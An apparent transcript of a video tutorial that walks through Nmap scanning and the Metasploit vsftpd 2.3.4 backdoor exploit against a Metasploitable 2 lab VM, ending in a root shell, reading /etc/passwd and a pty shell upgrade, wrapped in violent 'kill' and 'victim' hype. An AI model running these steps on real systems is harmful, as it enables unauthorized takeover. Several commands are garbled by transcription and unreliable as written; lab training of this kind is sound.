One scan, one exploit. System owned. You thought info gathering was fun? This is where we kill. Skip, you stay weak. This is Metasploit Masterclass. Crafting killers from code. Like, subscribe, bell, or watch from the sidelines. Let's strike. Basic exploitation is where theory becomes takeover. We find a weakness, trigger it, and gain control. All ethically in your lab. Remember, only test on systems you own. For example, VMs like Metasploitable 2 on VirtualBox. Unauthorized use is illegal. I am not responsible. We'll start with Nmap to find open doors, scan ports and services because it's the best for recon. Then we'll use that intel to fire a real exploit, exploit/Unix/FTP/VSFTPD_234_backdoor. This targets a backdoor in the VSFTPD FTP server version 2.3.4, a real-world vulnerability from 2011, perfect for learning. I'll explain every single step in detail, what it does, why it works, commands, options, risks, and tips. Follow along in your Linux VM. Step 1. Using Nmap to find open doors. Before exploiting, we need targets. Nmap is king here. Faster, stealthier, and more detailed than Metasploit auxiliaries for initial scans. It maps the network like a blueprint. Why Nmap? It detects hosts, ports, services, versions, and operating systems, revealing open doors like FTP on port 21. It's more powerful than Metasploit scanners because of the Nmap scripting engine and evasion options. Prepare your lab. Attacker, Inix VM. Target, Metasploitable 2 VM, a vulnerable Linux box. Network, same virtual network, for example, NAT or host only. Note the target IP, assume 192.168.89.109. Why? Safe, isolated environment. Snapshot VMS before testing. Basic host discovery. Command, nmap-sn 192.168.1.0/24. What it does. Pings the subnet without port scanning to find alive hosts quickly. Why? Confirms the target is up without noisy scanning. Tip: if ping is blocked, use -pn to assume host is up. Risk: too aggressive scans increase detection, start slow. Port and service scan. Command: nmap-p-sv192.168.89.109. What it does: scans all 65,535 ports and detects service versions. Why? Finds open doors, for example, 21/TCP open FTP vs FTPD 2.3.4, which reveals our target vulnerability. Tip: for speed, scan top ports with -P1 to 1000. Add -A for OS, scripts, and traceroute. Full scans take time. Use -min rate to accelerate if necessary. Step 2. Launching the exploit in Metasploit. With Nmap intel showing FTP open and VSFTPD 2.3.4, we trigger the backdoor. This backdoor opens a service on port 6200 after the trigger. No payload is needed. It gives a shell directly. Why this exploit? It's simple and reliable. It's a great teaching example. This is the real CVE 2011-2523. Start. Metasploit. Command. MSF console. What it does: launches the framework's interactive console. Search for the exploit. Command. Search VSFTPD. What it does: finds modules related to VSFTPD, e.g. exploit/Unix/FTPD_234_backdoor. Load the exploit. Command: use exploit/Unix/FTP/VSFTPD_234_backdoor. What it does: loads the module for configuration and execution. View info and options. Command: info. What it does: shows description, references, rank, and targets. Command: Show options, what it does, lists required, and optional settings, for example, RHOSTs and RPORT. Set required options, command, set RHOSTs 192.168.8.9.109. Optional, set RPORT 21 if needed. Check compatibility, command, check what it does, probes the target safely to confirm vulnerability. Not all modules implement check, but this one does. Fire the exploit. Command, exploit what it does, connects to FTP, sends the crafted username trigger, waits for the backdoor on port 6200, connects, and provides a root shell. Expected result, you receive a shell prompt. Run Huami to confirm UID equals 0 root. Tip: if it fails, you'll see errors. Common causes are wrong version or wrong target IP. Retry or run the exploit as a background job with exploit-j. Risk: the service may crash. Only perform this in your lab with permission. Interact and verify. Inside the shell, run commands like ls or cat/etc/passwd to confirm access. Use python-c quote import pty pty.spawn/bin/bash end quote to upgrade the shell for better interaction. Pro tip: this exploit uses its built-in behavior rather than setting a separate payload. In more advanced scenarios, you can choose a payload with show payloads. Always clean up by reverting your VM snapshot. You just claimed your first victim. Part 6. Web server hacking. We invade the web. Click now. More blood awaits. System owned.